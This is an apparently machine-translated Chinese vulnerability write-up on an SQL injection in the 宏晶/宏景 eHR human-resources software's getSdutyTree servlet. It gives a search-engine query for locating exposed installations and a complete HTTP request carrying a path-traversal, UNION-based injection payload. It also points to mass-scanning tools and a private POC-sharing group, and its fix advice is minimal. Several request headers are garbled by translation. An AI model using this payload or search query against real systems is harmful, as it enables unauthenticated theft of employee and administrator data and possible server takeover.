0x01 产品简介
宏晶eHR人力资源管理软件是一款集成人力资源管理和数字化应用的软件,以满足动态、协作、流程导向的战略需求。
0x02 漏洞概述
宏晶eHR /servlet/sduty/getSdutyTree接口中存在SQL注入漏洞,未经身份验证的远程攻击者除了利用SQL注入密码、用户个人信息等之外,还可以访问数据库(管理员后端)中的信息。 )。此外,即使拥有很高的权限,也可以向服务器写入木马,以获取服务器系统的进一步权限。
0x03 搜索引擎
app=\’HJSOFT-HCM\’
0x04 漏洞复现
GET /w_selfservice/oauthservlet/%2e./.%2e/servlet/sduty/getSdutyTree?param=childtarget=1codesetid=1codeitemid=1%27+UNION+ALL+SELECT+NULL%2CCHAR%28113%29%2BCHAR%28120% 29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28119%29%2BCHAR%2885%29%2BCHAR%2873%29%2BCHAR%2887%29% 2BCHAR%2899%29%2BCHAR%2875%29%2BCHAR%28116%29%2BCHAR%2872%29%2BCHAR%28113%29%2BCHAR%28104%29%2BCHAR%28107%29%2BCHAR%2889%29%2BCHAR% 28115%29%2BCHAR%28108%29%2BCHAR%2873%29%2BCHAR%2884%29%2BCHAR%2869%29%2BCHAR%2873%29%2BCHAR%2875%29%2BCHAR%2883%29%2BCHAR%2898% 29%2BCHAR%28116%29%2BCHAR%28120%29%2BCHAR%2889%29%2BCHAR%2884%29%2BCHAR%2882%29%2BCHAR%28120%29%2BCHAR%2884%29%2BCHAR%28116%29% 2BCHAR%2888%29%2BCHAR%28112%29%2BCHAR%2887%29%2BCHAR%2873%29%2BCHAR%28109%29%2BCHAR%28104%29%2BCHAR%2887%29%2BCHAR%28102%29%2BCHAR% 2897%29%2BCHAR%2877%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28113%29%2CNULL%2CNULL–+Iprd HTTP/1.1
Host:你的IP
用户代理: Mozilla/5.0(Macintosh;Intel Mac OS X 10.15;rv:125.0)Gecko/20100101 Firefox/125.0
Accept: 文本/html,应用程序/xhtml+xml,应用程序/xml;q=0.9,图像/avif,图像/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip、deflate、br
关闭连接:
验证SQL 映射
0x05 工具批量
nuclei
afrog
xray
POC脚本获取
使用VX扫描并加入我们内部的POC脚本共享圈。
0x06 修复建议
该软件现已发布安全修复更新,受影响的用户可以联系制造商获取补丁。
#【漏洞复现】以上宏景eHR sduty/getSdutyTree SQL注入漏洞相关内容摘自网络,仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/93242.html
